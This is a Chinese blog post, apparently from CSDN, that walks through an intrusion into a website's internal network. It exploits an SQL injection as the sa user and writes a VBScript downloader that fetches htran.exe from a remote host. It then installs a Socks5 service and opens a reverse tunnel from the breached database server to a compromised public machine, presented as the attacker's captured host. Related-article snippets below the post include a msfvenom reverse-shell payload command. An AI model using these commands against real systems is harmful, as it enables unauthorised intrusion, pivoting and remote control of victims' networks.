渗透内网方法之巧用代理

最新推荐文章于 2024-05-26 11:02:35 发布
最新推荐文章于 2024-05-26 11:02:35 发布
阅读量731 收藏 1
点赞数
分类专栏: 提权 文章标签: 数据库 下载工具 工具 windows 服务器 iis

代理在入侵里的作用—–妙用代理,渗透内网

  一、踩点

  主机: http://www.webshell.cc

  OS:Windows 2000 + IIS 5.0 + MSSQL

  端口:80 21i

  数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网.

  首页存在注入漏洞,sa登陆.

  注入点:

   http://www.webshell.cc/list.asp?id=1

  二、入侵思路

  1.给内网目标机装个代理服务器

  2.把弄好的那个代理端口映到公网.

  3.本机用sockscap连接公网映的那个端口,这样,自己也就进到了内网。

  4.接下来就是找共享,嗅探,社会工程学等等了。

  三、入侵准备

  1.公网肉鸡一只:218.3.1.1

  2.工具:htran2.4,SocksCap,扫描器一份,NBSI 2.0一份。

  3.A表示数据库主机,B表示公网肉鸡 C表示网站放Web的地方 D表示本机(也在内网) www.webshell.cc

  4.A:192.168.1.2 B:218.3.1.1 C:www.webshell.cc D:192.168.0.25

  四、入侵进行时

  1.工具上传:

  在nbsi下执行:

  echo Set x= CreateObject(^”Microsoft.XMLHTTP^”):x.Open ^”GET^”,LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^”ADODB.Stream^”):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >down.vbs

  然后下载工具:

  cscript down.vbs http://IP/htran.exe htran.exe 这个可以在网上找下

  2.安装Socks5服务

  在nbsi下执行:

  htran.exe -install //安装Socks5服务

  htran.exe -start //启动Socks5服务

  3.反弹进行时

  在B上运行: htran.exe -s -listen 520 5200 //监听端口

  在nbsi下执行:htran.exe -s -connect 218.3.1.1 520

  3.进入内网

  现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了他的内网。

  五、渗透内网

  接下来就可以扫描,嗅探,等等,也就是后话了。

fengling132
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
agent内网渗透代理相关
04-14
内网渗透代理
内网渗透之端口转发-内网代理1
08-03
①正向代理 (Forward Proxy) ②反向代理(reverse proxy) ③区分 ①内网机器上执行:lcx.exe –slave 公网 IP + 端
妙用代理渗透内网
cnbird's blog
10-24 4958
文章作者:LiNzi [BCT&混客联盟](chinaskyv@163.com) 信息来源:邪恶八进制信息安全团队 正文 代理在入侵里的作用-----妙用代理渗透内网 一、踩点 主机: http://www.baidu.com/ OS:Windows 2000 + IIS 5.0 + MSSQL 端口:80 21 数据库内网,IP为 192.168.1.2 ,更重要的是内网
内网渗透-代理(reGeorg)
weixin_33712987的博客
12-25 335
我对于reGeorg的使用,只是简单说下。 首先需要下载reGeorg,下载地址:https://github.com/sensepost/reGeorg 然后将reGeorg,上传到服务端。直接访问上传的reGeorg文件,提示“Georg says, 'All seems fine'”,则为正常(PHP版本的服务端,一直没有使用成功过)。 最后用在PC端使用命令行,运行py程序:pyth...
内网渗透-详解代理逻辑及隧道
最新发布
2401_84466225的博客
05-26 1102
红蓝对抗过程中打点以后往往需要进行内网渗透和横向移动,因此大家都需要扎实掌握代理和隧道知识,一款优秀的代理工具也可以给内网渗透带来很大的收益。本期分享,小星将通过简单易懂的方式向大家普及各种代理逻辑及隧道的原理和操作过程。1代理客户端,帮助客户端完成所需请求。举例:小星要向银行贷款,可是因为自己资历不够,所以不获银行放贷,小星个人无法贷到所需款项。此时,只要小星找一个满足资历的A先生去帮忙借贷,银行自然就会放贷。贷款到账后,A先生再私下把钱给到小星。
内网渗透代理、端口转发工具Termite
wswokao的博客
06-20 8546
特点: 工具在多种操作系统下均有Agent实现,由于代码为标准C实现,所以未来还将有更多的平台被支持。      Agent节点可相互连接,进而形成一条树状管理拓扑,依赖该拓扑结构,使用者可实时管理拓扑中的任意主机节点。     管理员可通过Admin程序,对拓扑中的任意节点进行管控,包括但不限于文件传输/控制台命令执行/开启远程 SOCKS5 代理服务/远程端口转发,等功能。# Usage1. ...
内网渗透代理转发
李斌的BLOG
02-19 1505
1 前言 谈到内网转发,在我们日常的渗透测试过程中经常会用到端口转发,可以利用代理脚本将内网的流量代理到本地进行访问,这样极大的方便了我们对内网进行横向渗透。 那为什么不直接通过登陆服务器来对内网中其他机器进行渗透,而是通过内网转发呢?意义何在呢? 因为……… 大部分时候拿到权限不够,无法直接登录。 而且如果在内网服务器中进行操作,我们需要上传工具进行很多操作,如果服务器缺少对应的环境变量或者组件,会导致渗透受阻。 而且直接远程登录会留下比较明显的痕迹。 因此内网转发是我们最好的选择,在本
内网渗透之域渗透.pdf
08-07
目录 工作组&域 域的渗透姿势 MS14-068 致谢
电脑教程内网渗透内网穿透.rar
10-25
总结一下,内网穿透是解决内网设备与公网通信的重要技术,它涉及多种实现方法,包括UDP hole punching、TCP SYN proxy、STUN/TURN/ICE等。实际操作中,我们可以借助第三方服务或自行配置端口转发、DDNS等。但同时,...
内网渗透之——数据压缩、传输
01-09
数据压缩 作用: 将文件打包,方便下载 Linux 直接使用tar命令压缩 windows 利用Rar.exe(winrar.exe里的执行文件) 参数说明: a 添加文件到压缩文件中 -k 锁定压缩文件 -s产生固体存档,这样可以增大压缩比 ...
傻瓜式web服务器
05-03
超级简单,只要解压缩就好了,D盘usr目录,点击启动阿帕奇,你就可以web访问自己的IP,自己的主页就有了,你可以修改成自己的页面!
内网渗透(一)反向代理实现外网访问到内网
m0_63699746的博客
08-02 1161
msfvenom -p windows/meterpreter/reverser_tcp LHOST=你的云服务器ip LPORT=3333(端口自定) -f exe > msf.exe ,生成的后门放到a虚拟机中。总结:首先攻击端(服务器)攻击具有内网和外网的虚拟机,取得权限,然后进行对另一台在同一内网的虚拟机进行渗透,通过开启隧道(也就是建立节点),让宿主机连接作为跳板的攻击机,来实现访问另一台内网上的虚拟机。攻击机(服务器)使用msf生成后门,放到a虚拟机中,点开与运行上线。
渗透代理小知识--
qq_46217803的博客
06-11 1005
渗透代理的理论要点,很大程度的帮助初学者了解代理的形成
内网渗透代理转发(5)--内网穿透
azraelxuemo的博客
07-14 282
实验环境 公网ip一个 35.194.217.195 monowall(防火墙) 受害者 kali 192.168.3.10 这里我们模拟了一般的内网环境,有时候内网机器可以上网,但由于防火墙的原因我们无法直接访问,那么我们有么有办法把这个内网的机器拉到公网上打呢? 答案是有的 这里前提条件是需要一个公网ip,可以用服务器 以下操作要在内网的机器上进行 首先再内网机器上ping我们的公网ip,可以ping通 同时也可以直接ssh到我们的公网ip 一旦确保了这些前提满足,就可以开始内网穿透了 穿透 这里我们自
内网渗透代理知识以及渗透某CTF三层靶机实例
m0_58595840的博客
01-04 1952
内网代理技术拿下某CTF三层靶机渗透
内网渗透建立代理通道(如何攻击目标内网机器?)-Socks代理(゚益゚メ) 渗透测试
寻觅的博客
04-25 2315
文章目录搭建靶场配置虚拟机网络虚拟机 搭建靶场 配置虚拟机网络 这里我用的是最常见的VMware Workstation虚拟机软件,我们先做一个内部的网络环境 虚拟机 我这里是使用的是CFS三层靶机环境 下载链接:https://pan.baidu.com/s/1n2i6Tr2lXC_T8kSEJFcBsA 提取码:ni2v 我发现网上的方法吧DHCP关掉后我的靶机就无法获取到IP地址了,所以我又开启了这里的DHCP。这里IP最后一段不和说明书是完全一样也不影响。 尝试一下通网段能互相ping通即可,

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值